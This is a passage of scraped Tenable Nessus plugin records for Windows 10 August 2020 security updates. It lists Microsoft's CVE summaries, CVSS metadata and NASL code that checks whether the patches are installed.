An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1473, CVE-2020-1557, CVE-2020-1558,\n CVE-2020-1564)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes input. An attacker\n who successfully exploited this vulnerability could take\n control of an affected system. (CVE-2020-1046)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1510)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Engine improperly handles memory.\n (CVE-2020-1535, CVE-2020-1536, CVE-2020-1539,\n CVE-2020-1540, CVE-2020-1541, CVE-2020-1542,\n CVE-2020-1543, CVE-2020-1544, CVE-2020-1545,\n CVE-2020-1546, CVE-2020-1547, CVE-2020-1551)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1479)\n\n - An elevation of privilege vulnerability exists when the\n Windows Ancillary Function Driver for WinSock improperly\n handles memory. (CVE-2020-1587)\n\n - An elevation of privilege vulnerability exists when the\n Windows Function Discovery SSDP Provider improperly\n handles memory. (CVE-2020-1579)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. 
(CVE-2020-1561, CVE-2020-1562)\n\n - An information disclosure vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The update\n addresses the vulnerability by correcting the way the\n Windows State Repository Service handles objects in\n memory. (CVE-2020-1512)\n\n - An elevation of privilege vulnerability exists when\n Windows Remote Access improperly handles memory.\n (CVE-2020-1530)\n\n - A remote code execution vulnerability exists in the way\n that the MSHTML engine improperly validates input. An\n attacker could execute arbitrary code in the context of\n the current user. (CVE-2020-1567)\n\n - A spoofing vulnerability exists when Windows incorrectly\n validates file signatures. An attacker who successfully\n exploited this vulnerability could bypass security\n features and load improperly signed files. In an attack\n scenario, an attacker could bypass security features\n intended to prevent improperly signed files from being\n loaded. 
The update addresses the vulnerability by\n correcting how Windows validates file signatures.\n (CVE-2020-1464)\");\n # https://support.microsoft.com/en-us/help/4571741/windows-10-update-kb4571741\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9371bc74\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4571741.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1564\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1561\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Spooler Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/08/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : 
Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-08';\nkbs = make_list(\n '4571741'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'16299',\n rollup_date:'08_2020',\n bulletin:bulletin,\n rollup_kb_list:[4571741])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:09:28", "description": "The remote Windows host is missing security update 4571709.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user 
rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1379, CVE-2020-1477, CVE-2020-1478, CVE-2020-1492, CVE-2020-1525, CVE-2020-1554)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1533, CVE-2020-1556)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. (CVE-2020-1511)\n\n - A remote code execution vulnerability exists when Windows Media Audio Codec improperly handles objects. An attacker who successfully exploited the vulnerability could take control of an affected system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Audio Codec handles objects. (CVE-2020-1339)\n\n - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. 
An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1569)\n\n - An elevation of privilege vulnerability exists when the Windows CDP User Components improperly handle memory.\n (CVE-2020-1549, CVE-2020-1550)\n\n - An information disclosure vulnerability exists when DirectWrite improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how DirectWrite handles objects in memory.\n (CVE-2020-1577)\n\n - An elevation of privilege vulnerability exists when the Windows Radio Manager API improperly handles memory.\n (CVE-2020-1528)\n\n - An information disclosure vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system (CVE-2020-1383)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge (HTML-based). The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1555)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folders Service improperly handles memory.\n (CVE-2020-1470, CVE-2020-1484, CVE-2020-1516)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. 
An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-1552)\n\n - An elevation of privilege vulnerability exists when the Windows Custom Protocol Engine improperly handles memory. (CVE-2020-1527)\n\n - An elevation of privilege vulnerability exists when the Storage Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges on the victim system.\n (CVE-2020-1490)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1480, CVE-2020-1529)\n\n - An elevation of privilege vulnerability exists when the Windows Speech Runtime improperly handles memory.\n (CVE-2020-1521, CVE-2020-1522)\n\n - An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.\n (CVE-2020-1489, CVE-2020-1513)\n\n - An elevation of privilege vulnerability exists when the Windows Accounts Control improperly handles memory.\n (CVE-2020-1531)\n\n - An elevation of privilege vulnerability exists in the Local Security Authority Subsystem Service (LSASS) when an authenticated attacker sends a specially crafted authentication request. A remote attacker who successfully exploited this vulnerability could cause an elevation of privilege on the target system's LSASS service. The security update addresses the vulnerability by changing the way that LSASS handles specially crafted authentication requests. 
(CVE-2020-1509)\n\n - A remote code execution vulnerability exists when the Windows Font Driver Host improperly handles memory. An attacker who successfully exploited the vulnerability would gain execution on a victim system. The security update addresses the vulnerability by correcting how the Windows Font Driver Host handles memory. (CVE-2020-1520)\n\n - An elevation of privilege vulnerability exists when the Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1519, CVE-2020-1538)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)\n\n - An elevation of privilege vulnerability exists when the Windows Telephony Server improperly handles memory.\n (CVE-2020-1515)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1487)\n\n - An elevation of privilege vulnerability exists when the Windows AppX Deployment Extensions improperly performs privilege management, resulting in access to system files. (CVE-2020-1488)\n\n - An elevation of privilege vulnerability exists when the Windows Network Connection Broker improperly handles memory. (CVE-2020-1526)\n\n - An elevation of privilege vulnerability exists in the way that the dnsrslvr.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1584)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. 
An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1553)\n\n - An elevation of privilege vulnerability exists when the Windows Speech Shell Components improperly handle memory. (CVE-2020-1524)\n\n - An elevation of privilege vulnerability exists when ASP.NET or .NET web applications running on IIS improperly allow access to cached files. An attacker who successfully exploited this vulnerability could gain access to restricted files. (CVE-2020-1476)\n\n - An elevation of privilege vulnerability exists when the Windows Remote Access improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges.\n (CVE-2020-1537)\n\n - An elevation of privilege vulnerability exists when the "Public Account Pictures" folder improperly handles junctions. (CVE-2020-1565)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. (CVE-2020-1534)\n\n - A remote code execution vulnerability exists when Microsoft Edge PDF Reader improperly handles objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1568)\n\n - An elevation of privilege vulnerability exists when the Windows Kernel API improperly handles registry objects in memory. 
An attacker who successfully exploited the vulnerability could gain elevated privileges on a targeted system. A locally authenticated attacker could exploit this vulnerability by running a specially crafted application. The security update addresses the vulnerability by helping to ensure that the Windows Kernel API properly handles objects in memory.\n (CVE-2020-1377, CVE-2020-1378)\n\n - An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1337)\n\n - An information disclosure vulnerability exists when the Windows WaasMedic Service improperly handles memory.\n (CVE-2020-1548)\n\n - An information disclosure vulnerability exists when the Windows Image Acquisition (WIA) Service improperly discloses contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system.\n (CVE-2020-1474, CVE-2020-1485)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1417, CVE-2020-1486, CVE-2020-1566)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. 
The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1473, CVE-2020-1557, CVE-2020-1558, CVE-2020-1564)\n\n - A remote code execution vulnerability exists when Microsoft .NET Framework processes input. An attacker who successfully exploited this vulnerability could take control of an affected system. (CVE-2020-1046)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1510)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Engine improperly handles memory.\n (CVE-2020-1535, CVE-2020-1536, CVE-2020-1539, CVE-2020-1540, CVE-2020-1541, CVE-2020-1542, CVE-2020-1543, CVE-2020-1544, CVE-2020-1545, CVE-2020-1546, CVE-2020-1547, CVE-2020-1551)\n\n - An information disclosure vulnerability exists in the Windows kernel that could allow an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (ASLR) bypass. An attacker who successfully exploited the vulnerability could retrieve the memory address of a kernel object. (CVE-2020-1578)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1479)\n\n - An elevation of privilege vulnerability exists when the Windows Ancillary Function Driver for WinSock improperly handles memory. (CVE-2020-1587)\n\n - An elevation of privilege vulnerability exists when the Windows Function Discovery SSDP Provider improperly handles memory. 
(CVE-2020-1579)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-1561, CVE-2020-1562)\n\n - An information disclosure vulnerability exists when the Windows State Repository Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows State Repository Service handles objects in memory. (CVE-2020-1512)\n\n - An elevation of privilege vulnerability exists when Windows Remote Access improperly handles memory.\n (CVE-2020-1530)\n\n - A remote code execution vulnerability exists in the way that the MSHTML engine improperly validates input. An attacker could execute arbitrary code in the context of the current user. (CVE-2020-1567)\n\n - A spoofing vulnerability exists when Windows incorrectly validates file signatures. An attacker who successfully exploited this vulnerability could bypass security features and load improperly signed files. In an attack scenario, an attacker could bypass security features intended to prevent improperly signed files from being loaded. 
The update addresses the vulnerability by correcting how Windows validates file signatures.\n (CVE-2020-1464)", "cvss3": {}, "published": "2020-08-11T00:00:00", "type": "nessus", "title": "KB4571709: Windows 10 Version 1803 August 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1046", "CVE-2020-1337", "CVE-2020-1339", "CVE-2020-1377", "CVE-2020-1378", "CVE-2020-1379", "CVE-2020-1380", "CVE-2020-1383", "CVE-2020-1417", "CVE-2020-1464", "CVE-2020-1470", "CVE-2020-1473", "CVE-2020-1474", "CVE-2020-1476", "CVE-2020-1477", "CVE-2020-1478", "CVE-2020-1479", "CVE-2020-1480", "CVE-2020-1484", "CVE-2020-1485", "CVE-2020-1486", "CVE-2020-1487", "CVE-2020-1488", "CVE-2020-1489", "CVE-2020-1490", "CVE-2020-1492", "CVE-2020-1509", "CVE-2020-1510", "CVE-2020-1511", "CVE-2020-1512", "CVE-2020-1513", "CVE-2020-1515", "CVE-2020-1516", "CVE-2020-1519", "CVE-2020-1520", "CVE-2020-1521", "CVE-2020-1522", "CVE-2020-1524", "CVE-2020-1525", "CVE-2020-1526", "CVE-2020-1527", "CVE-2020-1528", "CVE-2020-1529", "CVE-2020-1530", "CVE-2020-1531", "CVE-2020-1533", "CVE-2020-1534", "CVE-2020-1535", "CVE-2020-1536", "CVE-2020-1537", "CVE-2020-1538", "CVE-2020-1539", "CVE-2020-1540", "CVE-2020-1541", "CVE-2020-1542", "CVE-2020-1543", "CVE-2020-1544", "CVE-2020-1545", "CVE-2020-1546", "CVE-2020-1547", "CVE-2020-1548", "CVE-2020-1549", "CVE-2020-1550", "CVE-2020-1551", "CVE-2020-1552", "CVE-2020-1553", "CVE-2020-1554", "CVE-2020-1555", "CVE-2020-1556", "CVE-2020-1557", "CVE-2020-1558", "CVE-2020-1561", "CVE-2020-1562", "CVE-2020-1564", "CVE-2020-1565", "CVE-2020-1566", "CVE-2020-1567", "CVE-2020-1568", "CVE-2020-1569", "CVE-2020-1570", "CVE-2020-1577", "CVE-2020-1578", "CVE-2020-1579", "CVE-2020-1584", "CVE-2020-1587"], "modified": "2023-02-06T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_AUG_4571709.NASL", "href": "https://www.tenable.com/plugins/nessus/139490", "sourceData": "#\n# (C) Tenable Network Security, 
Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(139490);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/06\");\n\n script_cve_id(\n \"CVE-2020-1046\",\n \"CVE-2020-1337\",\n \"CVE-2020-1339\",\n \"CVE-2020-1377\",\n \"CVE-2020-1378\",\n \"CVE-2020-1379\",\n \"CVE-2020-1380\",\n \"CVE-2020-1383\",\n \"CVE-2020-1417\",\n \"CVE-2020-1464\",\n \"CVE-2020-1470\",\n \"CVE-2020-1473\",\n \"CVE-2020-1474\",\n \"CVE-2020-1476\",\n \"CVE-2020-1477\",\n \"CVE-2020-1478\",\n \"CVE-2020-1479\",\n \"CVE-2020-1480\",\n \"CVE-2020-1484\",\n \"CVE-2020-1485\",\n \"CVE-2020-1486\",\n \"CVE-2020-1487\",\n \"CVE-2020-1488\",\n \"CVE-2020-1489\",\n \"CVE-2020-1490\",\n \"CVE-2020-1492\",\n \"CVE-2020-1509\",\n \"CVE-2020-1510\",\n \"CVE-2020-1511\",\n \"CVE-2020-1512\",\n \"CVE-2020-1513\",\n \"CVE-2020-1515\",\n \"CVE-2020-1516\",\n \"CVE-2020-1519\",\n \"CVE-2020-1520\",\n \"CVE-2020-1521\",\n \"CVE-2020-1522\",\n \"CVE-2020-1524\",\n \"CVE-2020-1525\",\n \"CVE-2020-1526\",\n \"CVE-2020-1527\",\n \"CVE-2020-1528\",\n \"CVE-2020-1529\",\n \"CVE-2020-1530\",\n \"CVE-2020-1531\",\n \"CVE-2020-1533\",\n \"CVE-2020-1534\",\n \"CVE-2020-1535\",\n \"CVE-2020-1536\",\n \"CVE-2020-1537\",\n \"CVE-2020-1538\",\n \"CVE-2020-1539\",\n \"CVE-2020-1540\",\n \"CVE-2020-1541\",\n \"CVE-2020-1542\",\n \"CVE-2020-1543\",\n \"CVE-2020-1544\",\n \"CVE-2020-1545\",\n \"CVE-2020-1546\",\n \"CVE-2020-1547\",\n \"CVE-2020-1548\",\n \"CVE-2020-1549\",\n \"CVE-2020-1550\",\n \"CVE-2020-1551\",\n \"CVE-2020-1552\",\n \"CVE-2020-1553\",\n \"CVE-2020-1554\",\n \"CVE-2020-1555\",\n \"CVE-2020-1556\",\n \"CVE-2020-1557\",\n \"CVE-2020-1558\",\n \"CVE-2020-1561\",\n \"CVE-2020-1562\",\n \"CVE-2020-1564\",\n \"CVE-2020-1565\",\n \"CVE-2020-1566\",\n 
\"CVE-2020-1567\",\n \"CVE-2020-1568\",\n \"CVE-2020-1569\",\n \"CVE-2020-1570\",\n \"CVE-2020-1577\",\n \"CVE-2020-1578\",\n \"CVE-2020-1579\",\n \"CVE-2020-1584\",\n \"CVE-2020-1587\"\n );\n script_xref(name:\"MSKB\", value:\"4571709\");\n script_xref(name:\"MSFT\", value:\"MS20-4571709\");\n script_xref(name:\"IAVA\", value:\"2020-A-0361-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0367-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0370-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n\n script_name(english:\"KB4571709: Windows 10 Version 1803 August 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4571709.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1379,\n CVE-2020-1477, CVE-2020-1478, CVE-2020-1492,\n CVE-2020-1525, CVE-2020-1554)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. 
An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1533, CVE-2020-1556)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The security\n update addresses the vulnerability by correcting how the\n Connected User Experiences and Telemetry Service handles\n file operations. (CVE-2020-1511)\n\n - A remote code execution vulnerability exists when\n Windows Media Audio Codec improperly handles objects. An\n attacker who successfully exploited the vulnerability\n could take control of an affected system. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media Audio\n Codec handles objects. (CVE-2020-1339)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1569)\n\n - An elevation of privilege vulnerability exists when the\n Windows CDP User Components improperly handle memory.\n (CVE-2020-1549, CVE-2020-1550)\n\n - An information disclosure vulnerability exists when\n DirectWrite improperly discloses the contents of its\n memory. 
An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how DirectWrite handles objects in memory.\n (CVE-2020-1577)\n\n - An elevation of privilege vulnerability exists when the\n Windows Radio Manager API improperly handles memory.\n (CVE-2020-1528)\n\n - An information disclosure vulnerability exists in RPC if\n the server has Routing and Remote Access enabled. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system (CVE-2020-1383)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge (HTML-based). The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2020-1555)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folders Service improperly handles memory.\n (CVE-2020-1470, CVE-2020-1484, CVE-2020-1516)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. 
(CVE-2020-1552)\n\n - An elevation of privilege vulnerability exists when the\n Windows Custom Protocol Engine improperly handles\n memory. (CVE-2020-1527)\n\n - An elevation of privilege vulnerability exists when the\n Storage Service improperly handles file operations. An\n attacker who successfully exploited this vulnerability\n could gain elevated privileges on the victim system.\n (CVE-2020-1490)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-1480, CVE-2020-1529)\n\n - An elevation of privilege vulnerability exists when the\n Windows Speech Runtime improperly handles memory.\n (CVE-2020-1521, CVE-2020-1522)\n\n - An elevation of privilege vulnerability exists when the\n Windows CSC Service improperly handles memory.\n (CVE-2020-1489, CVE-2020-1513)\n\n - An elevation of privilege vulnerability exists when the\n Windows Accounts Control improperly handles memory.\n (CVE-2020-1531)\n\n - An elevation of privilege vulnerability exists in the\n Local Security Authority Subsystem Service (LSASS) when\n an authenticated attacker sends a specially crafted\n authentication request. A remote attacker who\n successfully exploited this vulnerability could cause an\n elevation of privilege on the target system's LSASS\n service. The security update addresses the vulnerability\n by changing the way that LSASS handles specially crafted\n authentication requests. (CVE-2020-1509)\n\n - A remote code execution vulnerability exists when the\n Windows Font Driver Host improperly handles memory. An\n attacker who successfully exploited the vulnerability\n would gain execution on a victim system. 
The security\n update addresses the vulnerability by correcting how the\n Windows Font Driver Host handles memory. (CVE-2020-1520)\n\n - An elevation of privilege vulnerability exists when the\n Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1519, CVE-2020-1538)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)\n\n - An elevation of privilege vulnerability exists when the\n Windows Telephony Server improperly handles memory.\n (CVE-2020-1515)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1487)\n\n - An elevation of privilege vulnerability exists when the\n Windows AppX Deployment Extensions improperly performs\n privilege management, resulting in access to system\n files. (CVE-2020-1488)\n\n - An elevation of privilege vulnerability exists when the\n Windows Network Connection Broker improperly handles\n memory. (CVE-2020-1526)\n\n - An elevation of privilege vulnerability exists in the\n way that the dnsrslvr.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1584)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. 
An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1553)\n\n - An elevation of privilege vulnerability exists when the\n Windows Speech Shell Components improperly handle\n memory. (CVE-2020-1524)\n\n - An elevation of privilege vulnerability exists when\n ASP.NET or .NET web applications running on IIS\n improperly allow access to cached files. An attacker who\n successfully exploited this vulnerability could gain\n access to restricted files. (CVE-2020-1476)\n\n - An elevation of privilege vulnerability exists when the\n Windows Remote Access improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could gain elevated privileges.\n (CVE-2020-1537)\n\n - An elevation of privilege vulnerability exists when the\n "Public Account Pictures" folder improperly\n handles junctions. (CVE-2020-1565)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. 